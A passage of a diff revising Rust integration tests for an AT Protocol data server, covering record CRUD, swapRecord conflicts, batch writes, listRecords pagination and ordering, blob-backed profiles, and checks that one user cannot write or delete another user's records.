(_bob_did, bob_jwt) = setup_new_user("bob-auth").await; 548 let post_payload = json!({ 549 "repo": alice_did, 550 "collection": "app.bsky.feed.post", 551 "rkey": "unauthorized-post", 552 - "record": { 553 - "$type": "app.bsky.feed.post", 554 - "text": "Bob trying to post as Alice", 555 - "createdAt": Utc::now().to_rfc3339() 556 - } 557 }); 558 - let res = client 559 - .post(format!( 560 - "{}/xrpc/com.atproto.repo.putRecord", 561 - base_url().await 562 - )) 563 .bearer_auth(&bob_jwt) 564 .json(&post_payload) 565 .send() 566 .await 567 .expect("Failed to send request"); 568 - assert!( 569 - res.status() == StatusCode::FORBIDDEN || res.status() == StatusCode::UNAUTHORIZED, 570 - "Expected 403 or 401 when writing to another user's repo, got {}", 571 - res.status() 572 - ); 573 - } 574 - 575 - #[tokio::test] 576 - async fn test_authorization_cannot_delete_other_record() { 577 - let client = client(); 578 - let (alice_did, alice_jwt) = setup_new_user("alice-del-auth").await; 579 - let (_bob_did, bob_jwt) = setup_new_user("bob-del-auth").await; 580 - let (post_uri, _) = create_post(&client, &alice_did, &alice_jwt, "Alice's post").await; 581 - let post_rkey = post_uri.split('/').last().unwrap(); 582 - let delete_payload = json!({ 583 - "repo": alice_did, 584 - "collection": "app.bsky.feed.post", 585 - "rkey": post_rkey 586 - }); 587 - let res = client 588 - .post(format!( 589 - "{}/xrpc/com.atproto.repo.deleteRecord", 590 - base_url().await 591 - )) 592 .bearer_auth(&bob_jwt) 593 .json(&delete_payload) 594 .send() 595 .await 596 .expect("Failed to send request"); 597 - assert!( 598 - res.status() == StatusCode::FORBIDDEN || res.status() == StatusCode::UNAUTHORIZED, 599 - "Expected 403 or 401 when deleting another user's record, got {}", 600 - res.status() 601 - ); 602 let get_res = client 603 - .get(format!( 604 - "{}/xrpc/com.atproto.repo.getRecord", 605 - base_url().await 606 - )) 607 - .query(&[ 608 - ("repo", alice_did.as_str()), 609 - ("collection", "app.bsky.feed.post"), 610 - ("rkey", post_rkey), 611 - ]) 612 .send() 613 .await 614 .expect("Failed to verify record exists"); 615 - assert_eq!( 616 - get_res.status(), 617 - StatusCode::OK, 618 - "Record should still exist" 619 - ); 620 } 621 622 #[tokio::test] 623 - async fn test_apply_writes_batch_lifecycle() { 624 let client = client(); 625 let (did, jwt) = setup_new_user("apply-writes-batch").await; 626 let now = Utc::now().to_rfc3339(); 627 let writes_payload = json!({ 628 "repo": did, 629 "writes": [ 630 - { 631 - "$type": "com.atproto.repo.applyWrites#create", 632 - "collection": "app.bsky.feed.post", 633 - "rkey": "batch-post-1", 634 - "value": { 635 - "$type": "app.bsky.feed.post", 636 - "text": "First batch post", 637 - "createdAt": now 638 - } 639 - }, 640 - { 641 - "$type": "com.atproto.repo.applyWrites#create", 642 - "collection": "app.bsky.feed.post", 643 - "rkey": "batch-post-2", 644 - "value": { 645 - "$type": "app.bsky.feed.post", 646 - "text": "Second batch post", 647 - "createdAt": now 648 - } 649 - }, 650 - { 651 - "$type": "com.atproto.repo.applyWrites#create", 652 - "collection": "app.bsky.actor.profile", 653 - "rkey": "self", 654 - "value": { 655 - "$type": "app.bsky.actor.profile", 656 - "displayName": "Batch User" 657 - } 658 - } 659 ] 660 }); 661 let apply_res = client 662 - .post(format!( 663 - "{}/xrpc/com.atproto.repo.applyWrites", 664 - base_url().await 665 - )) 666 .bearer_auth(&jwt) 667 .json(&writes_payload) 668 .send() ··· 670 .expect("Failed to apply writes"); 671 assert_eq!(apply_res.status(), StatusCode::OK); 672 let get_post1 = client 673 - .get(format!( 674 - "{}/xrpc/com.atproto.repo.getRecord", 675 - base_url().await 676 - )) 677 - .query(&[ 678 - ("repo", did.as_str()), 679 - ("collection", "app.bsky.feed.post"), 680 - ("rkey", "batch-post-1"), 681 - ]) 682 - .send() 683 - .await 684 - .expect("Failed to get post 1"); 685 assert_eq!(get_post1.status(), StatusCode::OK); 686 let post1_body: Value = get_post1.json().await.unwrap(); 687 assert_eq!(post1_body["value"]["text"], "First batch post"); 688 let get_post2 = client 689 - .get(format!( 690 - "{}/xrpc/com.atproto.repo.getRecord", 691 - base_url().await 692 - )) 693 - .query(&[ 694 - ("repo", did.as_str()), 695 - ("collection", "app.bsky.feed.post"), 696 - ("rkey", "batch-post-2"), 697 - ]) 698 - .send() 699 - .await 700 - .expect("Failed to get post 2"); 701 assert_eq!(get_post2.status(), StatusCode::OK); 702 let get_profile = client 703 - .get(format!( 704 - "{}/xrpc/com.atproto.repo.getRecord", 705 - base_url().await 706 - )) 707 - .query(&[ 708 - ("repo", did.as_str()), 709 - ("collection", "app.bsky.actor.profile"), 710 - ("rkey", "self"), 711 - ]) 712 - .send() 713 - .await 714 - .expect("Failed to get profile"); 715 - assert_eq!(get_profile.status(), StatusCode::OK); 716 let profile_body: Value = get_profile.json().await.unwrap(); 717 assert_eq!(profile_body["value"]["displayName"], "Batch User"); 718 let update_writes = json!({ 719 "repo": did, 720 "writes": [ 721 - { 722 - "$type": "com.atproto.repo.applyWrites#update", 723 - "collection": "app.bsky.actor.profile", 724 - "rkey": "self", 725 - "value": { 726 - "$type": "app.bsky.actor.profile", 727 - "displayName": "Updated Batch User" 728 - } 729 - }, 730 - { 731 - "$type": "com.atproto.repo.applyWrites#delete", 732 - "collection": "app.bsky.feed.post", 733 - "rkey": "batch-post-1" 734 - } 735 ] 736 }); 737 let update_res = client 738 - .post(format!( 739 - "{}/xrpc/com.atproto.repo.applyWrites", 740 - base_url().await 741 - )) 742 .bearer_auth(&jwt) 743 .json(&update_writes) 744 .send() ··· 746 .expect("Failed to apply update writes"); 747 assert_eq!(update_res.status(), StatusCode::OK); 748 let get_updated_profile = client 749 - .get(format!( 750 - "{}/xrpc/com.atproto.repo.getRecord", 751 - base_url().await 752 - )) 753 - .query(&[ 754 - ("repo", did.as_str()), 755 - ("collection", "app.bsky.actor.profile"), 756 - ("rkey", "self"), 757 - ]) 758 - .send() 759 - .await 760 - .expect("Failed to get updated profile"); 761 let updated_profile: Value = get_updated_profile.json().await.unwrap(); 762 - assert_eq!( 763 - updated_profile["value"]["displayName"], 764 - "Updated Batch User" 765 - ); 766 let get_deleted_post = client 767 - .get(format!( 768 - "{}/xrpc/com.atproto.repo.getRecord", 769 - base_url().await 770 - )) 771 - .query(&[ 772 - ("repo", did.as_str()), 773 - ("collection", "app.bsky.feed.post"), 774 - ("rkey", "batch-post-1"), 775 - ]) 776 - .send() 777 - .await 778 - .expect("Failed to check deleted post"); 779 - assert_eq!( 780 - get_deleted_post.status(), 781 - StatusCode::NOT_FOUND, 782 - "Batch-deleted post should be gone" 783 - ); 784 } 785 786 - async fn create_post_with_rkey( 787 - client: &reqwest::Client, 788 - did: &str, 789 - jwt: &str, 790 - rkey: &str, 791 - text: &str, 792 - ) -> (String, String) { 793 let payload = json!({ 794 - "repo": did, 795 - "collection": "app.bsky.feed.post", 796 - "rkey": rkey, 797 - "record": { 798 - "$type": "app.bsky.feed.post", 799 - "text": text, 800 - "createdAt": Utc::now().to_rfc3339() 801 - } 802 }); 803 let res = client 804 - .post(format!( 805 - "{}/xrpc/com.atproto.repo.putRecord", 806 - base_url().await 807 - )) 808 .bearer_auth(jwt) 809 .json(&payload) 810 .send() ··· 812 .expect("Failed to create record"); 813 assert_eq!(res.status(), StatusCode::OK); 814 let body: Value = res.json().await.unwrap(); 815 - ( 816 - body["uri"].as_str().unwrap().to_string(), 817 - body["cid"].as_str().unwrap().to_string(), 818 - ) 819 } 820 821 #[tokio::test] 822 - async fn test_list_records_default_order() { 823 let client = client(); 824 - let (did, jwt) = setup_new_user("list-default-order").await; 825 - create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await; 826 - tokio::time::sleep(Duration::from_millis(50)).await; 827 - create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await; 828 - tokio::time::sleep(Duration::from_millis(50)).await; 829 - create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await; 830 - let res = client 831 - .get(format!( 832 - "{}/xrpc/com.atproto.repo.listRecords", 833 - base_url().await 834 - )) 835 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 836 - .send() 837 - .await 838 - .expect("Failed to list records"); 839 - assert_eq!(res.status(), StatusCode::OK); 840 - let body: Value = res.json().await.unwrap(); 841 - let records = body["records"].as_array().unwrap(); 842 - assert_eq!(records.len(), 3); 843 - let rkeys: Vec<&str> = records 844 - .iter() 845 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 846 - .collect(); 847 - assert_eq!( 848 - rkeys, 849 - vec!["cccc", "bbbb", "aaaa"], 850 - "Default order should be DESC (newest first)" 851 - ); 852 - } 853 - 854 - #[tokio::test] 855 - async fn test_list_records_reverse_true() { 856 - let client = client(); 857 - let (did, jwt) = setup_new_user("list-reverse").await; 858 - create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await; 859 - tokio::time::sleep(Duration::from_millis(50)).await; 860 - create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await; 861 - tokio::time::sleep(Duration::from_millis(50)).await; 862 - create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await; 863 - let res = client 864 - .get(format!( 865 - "{}/xrpc/com.atproto.repo.listRecords", 866 - base_url().await 867 - )) 868 - .query(&[ 869 - ("repo", did.as_str()), 870 - ("collection", "app.bsky.feed.post"), 871 - ("reverse", "true"), 872 - ]) 873 - .send() 874 - .await 875 - .expect("Failed to list records"); 876 - assert_eq!(res.status(), StatusCode::OK); 877 - let body: Value = res.json().await.unwrap(); 878 - let records = body["records"].as_array().unwrap(); 879 - let rkeys: Vec<&str> = records 880 - .iter() 881 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 882 - .collect(); 883 - assert_eq!( 884 - rkeys, 885 - vec!["aaaa", "bbbb", "cccc"], 886 - "reverse=true should give ASC order (oldest first)" 887 - ); 888 - } 889 - 890 - #[tokio::test] 891 - async fn test_list_records_cursor_pagination() { 892 - let client = client(); 893 - let (did, jwt) = setup_new_user("list-cursor").await; 894 for i in 0..5 { 895 - create_post_with_rkey( 896 - &client, 897 - &did, 898 - &jwt, 899 - &format!("post{:02}", i), 900 - &format!("Post {}", i), 901 - ) 902 - .await; 903 tokio::time::sleep(Duration::from_millis(50)).await; 904 } 905 let res = client 906 - .get(format!( 907 - "{}/xrpc/com.atproto.repo.listRecords", 908 - base_url().await 909 - )) 910 - .query(&[ 911 - ("repo", did.as_str()), 912 - ("collection", "app.bsky.feed.post"), 913 - ("limit", "2"), 914 - ]) 915 - .send() 916 - .await 917 - .expect("Failed to list records"); 918 - assert_eq!(res.status(), StatusCode::OK); 919 - let body: Value = res.json().await.unwrap(); 920 - let records = body["records"].as_array().unwrap(); 921 - assert_eq!(records.len(), 2); 922 - let cursor = body["cursor"] 923 - .as_str() 924 - .expect("Should have cursor with more records"); 925 - let res2 = client 926 - .get(format!( 927 - "{}/xrpc/com.atproto.repo.listRecords", 928 - base_url().await 929 - )) 930 - .query(&[ 931 - ("repo", did.as_str()), 932 - ("collection", "app.bsky.feed.post"), 933 - ("limit", "2"), 934 - ("cursor", cursor), 935 - ]) 936 - .send() 937 - .await 938 - .expect("Failed to list records with cursor"); 939 - assert_eq!(res2.status(), StatusCode::OK); 940 - let body2: Value = res2.json().await.unwrap(); 941 - let records2 = body2["records"].as_array().unwrap(); 942 - assert_eq!(records2.len(), 2); 943 - let all_uris: Vec<&str> = records 944 - .iter() 945 - .chain(records2.iter()) 946 - .map(|r| r["uri"].as_str().unwrap()) 947 - .collect(); 948 - let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 949 - assert_eq!( 950 - all_uris.len(), 951 - unique_uris.len(), 952 - "Cursor pagination should not repeat records" 953 - ); 954 - } 955 - 956 - #[tokio::test] 957 - async fn test_list_records_rkey_start() { 958 - let client = client(); 959 - let (did, jwt) = setup_new_user("list-rkey-start").await; 960 - create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await; 961 - create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await; 962 - create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await; 963 - create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await; 964 - let res = client 965 - .get(format!( 966 - "{}/xrpc/com.atproto.repo.listRecords", 967 - base_url().await 968 - )) 969 - .query(&[ 970 - ("repo", did.as_str()), 971 - ("collection", "app.bsky.feed.post"), 972 - ("rkeyStart", "bbbb"), 973 - ("reverse", "true"), 974 - ]) 975 - .send() 976 - .await 977 - .expect("Failed to list records"); 978 - assert_eq!(res.status(), StatusCode::OK); 979 - let body: Value = res.json().await.unwrap(); 980 - let records = body["records"].as_array().unwrap(); 981 - let rkeys: Vec<&str> = records 982 - .iter() 983 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 984 - .collect(); 985 - for rkey in &rkeys { 986 - assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start"); 987 - } 988 - } 989 - 990 - #[tokio::test] 991 - async fn test_list_records_rkey_end() { 992 - let client = client(); 993 - let (did, jwt) = setup_new_user("list-rkey-end").await; 994 - create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await; 995 - create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await; 996 - create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await; 997 - create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await; 998 - let res = client 999 - .get(format!( 1000 - "{}/xrpc/com.atproto.repo.listRecords", 1001 - base_url().await 1002 - )) 1003 - .query(&[ 1004 - ("repo", did.as_str()), 1005 - ("collection", "app.bsky.feed.post"), 1006 - ("rkeyEnd", "cccc"), 1007 - ("reverse", "true"), 1008 - ]) 1009 - .send() 1010 - .await 1011 - .expect("Failed to list records"); 1012 - assert_eq!(res.status(), StatusCode::OK); 1013 - let body: Value = res.json().await.unwrap(); 1014 - let records = body["records"].as_array().unwrap(); 1015 - let rkeys: Vec<&str> = records 1016 - .iter() 1017 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 1018 - .collect(); 1019 - for rkey in &rkeys { 1020 - assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end"); 1021 - } 1022 - } 1023 - 1024 - #[tokio::test] 1025 - async fn test_list_records_rkey_range() { 1026 - let client = client(); 1027 - let (did, jwt) = setup_new_user("list-rkey-range").await; 1028 - create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await; 1029 - create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await; 1030 - create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await; 1031 - create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await; 1032 - create_post_with_rkey(&client, &did, &jwt, "eeee", "Fifth").await; 1033 - let res = client 1034 - .get(format!( 1035 - "{}/xrpc/com.atproto.repo.listRecords", 1036 - base_url().await 1037 - )) 1038 - .query(&[ 1039 - ("repo", did.as_str()), 1040 - ("collection", "app.bsky.feed.post"), 1041 - ("rkeyStart", "bbbb"), 1042 - ("rkeyEnd", "dddd"), 1043 - ("reverse", "true"), 1044 - ]) 1045 - .send() 1046 - .await 1047 - .expect("Failed to list records"); 1048 - assert_eq!(res.status(), StatusCode::OK); 1049 - let body: Value = res.json().await.unwrap(); 1050 - let records = body["records"].as_array().unwrap(); 1051 - let rkeys: Vec<&str> = records 1052 - .iter() 1053 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 1054 - .collect(); 1055 - for rkey in &rkeys { 1056 - assert!( 1057 - *rkey >= "bbbb" && *rkey <= "dddd", 1058 - "Range should be inclusive, got {}", 1059 - rkey 1060 - ); 1061 - } 1062 - assert!( 1063 - !rkeys.is_empty(), 1064 - "Should have at least some records in range" 1065 - ); 1066 - } 1067 - 1068 - #[tokio::test] 1069 - async fn test_list_records_limit_clamping_max() { 1070 - let client = client(); 1071 - let (did, jwt) = setup_new_user("list-limit-max").await; 1072 - for i in 0..5 { 1073 - create_post_with_rkey( 1074 - &client, 1075 - &did, 1076 - &jwt, 1077 - &format!("post{:02}", i), 1078 - &format!("Post {}", i), 1079 - ) 1080 - .await; 1081 - } 1082 - let res = client 1083 - .get(format!( 1084 - "{}/xrpc/com.atproto.repo.listRecords", 1085 - base_url().await 1086 - )) 1087 - .query(&[ 1088 - ("repo", did.as_str()), 1089 - ("collection", "app.bsky.feed.post"), 1090 - ("limit", "1000"), 1091 - ]) 1092 - .send() 1093 - .await 1094 - .expect("Failed to list records"); 1095 - assert_eq!(res.status(), StatusCode::OK); 1096 - let body: Value = res.json().await.unwrap(); 1097 - let records = body["records"].as_array().unwrap(); 1098 - assert!(records.len() <= 100, "Limit should be clamped to max 100"); 1099 - } 1100 - 1101 - #[tokio::test] 1102 - async fn test_list_records_limit_clamping_min() { 1103 - let client = client(); 1104 - let (did, jwt) = setup_new_user("list-limit-min").await; 1105 - create_post_with_rkey(&client, &did, &jwt, "aaaa", "Post").await; 1106 - let res = client 1107 - .get(format!( 1108 - "{}/xrpc/com.atproto.repo.listRecords", 1109 - base_url().await 1110 - )) 1111 - .query(&[ 1112 - ("repo", did.as_str()), 1113 - ("collection", "app.bsky.feed.post"), 1114 - ("limit", "0"), 1115 - ]) 1116 - .send() 1117 - .await 1118 - .expect("Failed to list records"); 1119 - assert_eq!(res.status(), StatusCode::OK); 1120 - let body: Value = res.json().await.unwrap(); 1121 - let records = body["records"].as_array().unwrap(); 1122 - assert!(records.len() >= 1, "Limit should be clamped to min 1"); 1123 - } 1124 - 1125 - #[tokio::test] 1126 - async fn test_list_records_empty_collection() { 1127 - let client = client(); 1128 - let (did, _jwt) = setup_new_user("list-empty").await; 1129 - let res = client 1130 - .get(format!( 1131 - "{}/xrpc/com.atproto.repo.listRecords", 1132 - base_url().await 1133 - )) 1134 .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 1135 - .send() 1136 - .await 1137 - .expect("Failed to list records"); 1138 - assert_eq!(res.status(), StatusCode::OK); 1139 - let body: Value = res.json().await.unwrap(); 1140 - let records = body["records"].as_array().unwrap(); 1141 - assert!( 1142 - records.is_empty(), 1143 - "Empty collection should return empty array" 1144 - ); 1145 - assert!( 1146 - body["cursor"].is_null(), 1147 - "Empty collection should have no cursor" 1148 - ); 1149 - } 1150 - 1151 - #[tokio::test] 1152 - async fn test_list_records_exact_limit() { 1153 - let client = client(); 1154 - let (did, jwt) = setup_new_user("list-exact-limit").await; 1155 - for i in 0..10 { 1156 - create_post_with_rkey( 1157 - &client, 1158 - &did, 1159 - &jwt, 1160 - &format!("post{:02}", i), 1161 - &format!("Post {}", i), 1162 - ) 1163 - .await; 1164 - } 1165 - let res = client 1166 - .get(format!( 1167 - "{}/xrpc/com.atproto.repo.listRecords", 1168 - base_url().await 1169 - )) 1170 - .query(&[ 1171 - ("repo", did.as_str()), 1172 - ("collection", "app.bsky.feed.post"), 1173 - ("limit", "5"), 1174 - ]) 1175 - .send() 1176 - .await 1177 - .expect("Failed to list records"); 1178 - assert_eq!(res.status(), StatusCode::OK); 1179 - let body: Value = res.json().await.unwrap(); 1180 - let records = body["records"].as_array().unwrap(); 1181 - assert_eq!( 1182 - records.len(), 1183 - 5, 1184 - "Should return exactly 5 records when limit=5" 1185 - ); 1186 - } 1187 - 1188 - #[tokio::test] 1189 - async fn test_list_records_cursor_exhaustion() { 1190 - let client = client(); 1191 - let (did, jwt) = setup_new_user("list-cursor-exhaust").await; 1192 - for i in 0..3 { 1193 - create_post_with_rkey( 1194 - &client, 1195 - &did, 1196 - &jwt, 1197 - &format!("post{:02}", i), 1198 - &format!("Post {}", i), 1199 - ) 1200 - .await; 1201 - } 1202 - let res = client 1203 - .get(format!( 1204 - "{}/xrpc/com.atproto.repo.listRecords", 1205 - base_url().await 1206 - )) 1207 - .query(&[ 1208 - ("repo", did.as_str()), 1209 - ("collection", "app.bsky.feed.post"), 1210 - ("limit", "10"), 1211 - ]) 1212 - .send() 1213 - .await 1214 - .expect("Failed to list records"); 1215 - assert_eq!(res.status(), StatusCode::OK); 1216 - let body: Value = res.json().await.unwrap(); 1217 - let records = body["records"].as_array().unwrap(); 1218 - assert_eq!(records.len(), 3); 1219 - } 1220 - 1221 - #[tokio::test] 1222 - async fn test_list_records_repo_not_found() { 1223 - let client = client(); 1224 - let res = client 1225 - .get(format!( 1226 - "{}/xrpc/com.atproto.repo.listRecords", 1227 - base_url().await 1228 - )) 1229 - .query(&[ 1230 - ("repo", "did:plc:nonexistent12345"), 1231 - ("collection", "app.bsky.feed.post"), 1232 - ]) 1233 - .send() 1234 - .await 1235 - .expect("Failed to list records"); 1236 - assert_eq!(res.status(), StatusCode::NOT_FOUND); 1237 - } 1238 - 1239 - #[tokio::test] 1240 - async fn test_list_records_includes_cid() { 1241 - let client = client(); 1242 - let (did, jwt) = setup_new_user("list-includes-cid").await; 1243 - create_post_with_rkey(&client, &did, &jwt, "test", "Test post").await; 1244 - let res = client 1245 - .get(format!( 1246 - "{}/xrpc/com.atproto.repo.listRecords", 1247 - base_url().await 1248 - )) 1249 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 1250 - .send() 1251 - .await 1252 - .expect("Failed to list records"); 1253 assert_eq!(res.status(), StatusCode::OK); 1254 let body: Value = res.json().await.unwrap(); 1255 let records = body["records"].as_array().unwrap(); 1256 for record in records { 1257 - assert!(record["uri"].is_string(), "Record should have uri"); 1258 - assert!(record["cid"].is_string(), "Record should have cid"); 1259 - assert!(record["value"].is_object(), "Record should have value"); 1260 - let cid = record["cid"].as_str().unwrap(); 1261 - assert!(cid.starts_with("bafy"), "CID should be valid"); 1262 - } 1263 - } 1264 - 1265 - #[tokio::test] 1266 - async fn test_list_records_cursor_with_reverse() { 1267 - let client = client(); 1268 - let (did, jwt) = setup_new_user("list-cursor-reverse").await; 1269 - for i in 0..5 { 1270 - create_post_with_rkey( 1271 - &client, 1272 - &did, 1273 - &jwt, 1274 - &format!("post{:02}", i), 1275 - &format!("Post {}", i), 1276 - ) 1277 - .await; 1278 } 1279 - let res = client 1280 - .get(format!( 1281 - "{}/xrpc/com.atproto.repo.listRecords", 1282 - base_url().await 1283 - )) 1284 - .query(&[ 1285 - ("repo", did.as_str()), 1286 - ("collection", "app.bsky.feed.post"), 1287 - ("limit", "2"), 1288 - ("reverse", "true"), 1289 - ]) 1290 - .send() 1291 - .await 1292 - .expect("Failed to list records"); 1293 - assert_eq!(res.status(), StatusCode::OK); 1294 - let body: Value = res.json().await.unwrap(); 1295 - let records = body["records"].as_array().unwrap(); 1296 - let first_rkeys: Vec<&str> = records 1297 - .iter() 1298 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 1299 - .collect(); 1300 - assert_eq!( 1301 - first_rkeys, 1302 - vec!["post00", "post01"], 1303 - "First page with reverse should start from oldest" 1304 - ); 1305 - if let Some(cursor) = body["cursor"].as_str() { 1306 - let res2 = client 1307 - .get(format!( 1308 - "{}/xrpc/com.atproto.repo.listRecords", 1309 - base_url().await 1310 - )) 1311 - .query(&[ 1312 - ("repo", did.as_str()), 1313 - ("collection", "app.bsky.feed.post"), 1314 - ("limit", "2"), 1315 - ("reverse", "true"), 1316 - ("cursor", cursor), 1317 - ]) 1318 - .send() 1319 - .await 1320 - .expect("Failed to list records with cursor"); 1321 - let body2: Value = res2.json().await.unwrap(); 1322 - let records2 = body2["records"].as_array().unwrap(); 1323 - let second_rkeys: Vec<&str> = records2 1324 - .iter() 1325 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 1326 - .collect(); 1327 - assert_eq!( 1328 - second_rkeys, 1329 - vec!["post02", "post03"], 1330 - "Second page should continue in ASC order" 1331 - ); 1332 } 1333 }
··· 8 use std::time::Duration; 9 10 #[tokio::test] 11 + async fn test_record_crud_lifecycle() { 12 let client = client(); 13 let (did, jwt) = setup_new_user("lifecycle-crud").await; 14 let collection = "app.bsky.feed.post"; ··· 26 } 27 }); 28 let create_res = client 29 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 30 .bearer_auth(&jwt) 31 .json(&create_payload) 32 .send() 33 .await 34 .expect("Failed to send create request"); 35 + assert_eq!(create_res.status(), StatusCode::OK, "Failed to create record"); 36 + let create_body: Value = create_res.json().await.expect("create response was not JSON"); 37 let uri = create_body["uri"].as_str().unwrap(); 38 + let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 39 + let params = [("repo", did.as_str()), ("collection", collection), ("rkey", &rkey)]; 40 let get_res = client 41 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 42 .query(&params) 43 .send() 44 .await 45 .expect("Failed to send get request"); 46 + assert_eq!(get_res.status(), StatusCode::OK, "Failed to get record after create"); 47 let get_body: Value = get_res.json().await.expect("get response was not JSON"); 48 assert_eq!(get_body["uri"], uri); 49 assert_eq!(get_body["value"]["text"], original_text); ··· 52 "repo": did, 53 "collection": collection, 54 "rkey": rkey, 55 + "record": { "$type": collection, "text": updated_text, "createdAt": now }, 56 + "swapRecord": initial_cid 57 }); 58 let update_res = client 59 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 60 .bearer_auth(&jwt) 61 .json(&update_payload) 62 .send() 63 .await 64 .expect("Failed to send update request"); 65 + assert_eq!(update_res.status(), StatusCode::OK, "Failed to update record"); 66 + let update_body: Value = update_res.json().await.expect("update response was not JSON"); 67 + let updated_cid = update_body["cid"].as_str().unwrap().to_string(); 68 let get_updated_res = client 69 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 70 .query(&params) 71 .send() 72 .await 73 .expect("Failed to send get-after-update request"); 74 + let get_updated_body: Value = get_updated_res.json().await.expect("get-updated response was not JSON"); 75 + assert_eq!(get_updated_body["value"]["text"], updated_text, "Text was not updated"); 76 + let stale_update_payload = json!({ 77 + "repo": did, 78 + "collection": collection, 79 + "rkey": rkey, 80 + "record": { "$type": collection, "text": "Stale update", "createdAt": now }, 81 + "swapRecord": initial_cid 82 + }); 83 + let stale_res = client 84 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 85 + .bearer_auth(&jwt) 86 + .json(&stale_update_payload) 87 + .send() 88 .await 89 + .expect("Failed to send stale update"); 90 + assert_eq!(stale_res.status(), StatusCode::CONFLICT, "Stale update should cause 409"); 91 + let good_update_payload = json!({ 92 "repo": did, 93 "collection": collection, 94 + "rkey": rkey, 95 + "record": { "$type": collection, "text": "Good update", "createdAt": now }, 96 + "swapRecord": updated_cid 97 }); 98 + let good_res = client 99 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 100 + .bearer_auth(&jwt) 101 + .json(&good_update_payload) 102 + .send() 103 + .await 104 + .expect("Failed to send good update"); 105 + assert_eq!(good_res.status(), StatusCode::OK, "Good update should succeed"); 106 + let delete_payload = json!({ "repo": did, "collection": collection, "rkey": rkey }); 107 let delete_res = client 108 + .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await)) 109 .bearer_auth(&jwt) 110 .json(&delete_payload) 111 .send() 112 .await 113 .expect("Failed to send delete request"); 114 + assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete record"); 115 let get_deleted_res = client 116 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 117 .query(&params) 118 .send() 119 .await 120 .expect("Failed to send get-after-delete request"); 121 + assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Record should be deleted"); 122 } 123 124 #[tokio::test] 125 + async fn test_profile_with_blob_lifecycle() { 126 let client = client(); 127 + let (did, jwt) = setup_new_user("profile-blob").await; 128 + let blob_data = b"This is test blob data for a profile avatar"; 129 + let upload_res = client 130 + .post(format!("{}/xrpc/com.atproto.repo.uploadBlob", base_url().await)) 131 + .header(header::CONTENT_TYPE, "text/plain") 132 + .bearer_auth(&jwt) 133 + .body(blob_data.to_vec()) 134 .send() 135 .await 136 + .expect("Failed to upload blob"); 137 + assert_eq!(upload_res.status(), StatusCode::OK); 138 + let upload_body: Value = upload_res.json().await.unwrap(); 139 + let blob_ref = upload_body["blob"].clone(); 140 let profile_payload = json!({ 141 "repo": did, 142 "collection": "app.bsky.actor.profile", ··· 144 "record": { 145 "$type": "app.bsky.actor.profile", 146 "displayName": "Test User", 147 + "description": "A test profile for lifecycle testing", 148 + "avatar": blob_ref 149 } 150 }); 151 let create_res = client 152 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 153 .bearer_auth(&jwt) 154 .json(&profile_payload) 155 .send() 156 .await 157 .expect("Failed to create profile"); 158 + assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile"); 159 let create_body: Value = create_res.json().await.unwrap(); 160 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 161 let get_res = client 162 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 163 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 164 .send() 165 .await 166 .expect("Failed to get profile"); 167 assert_eq!(get_res.status(), StatusCode::OK); 168 let get_body: Value = get_res.json().await.unwrap(); 169 assert_eq!(get_body["value"]["displayName"], "Test User"); 170 + assert!(get_body["value"]["avatar"]["ref"]["$link"].is_string()); 171 let update_payload = json!({ 172 "repo": did, 173 "collection": "app.bsky.actor.profile", 174 "rkey": "self", 175 + "record": { "$type": "app.bsky.actor.profile", "displayName": "Updated User", "description": "Profile updated" }, 176 "swapRecord": initial_cid 177 }); 178 let update_res = client 179 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 180 .bearer_auth(&jwt) 181 .json(&update_payload) 182 .send() 183 .await 184 .expect("Failed to update profile"); 185 + assert_eq!(update_res.status(), StatusCode::OK, "Failed to update profile"); 186 let get_updated_res = client 187 + 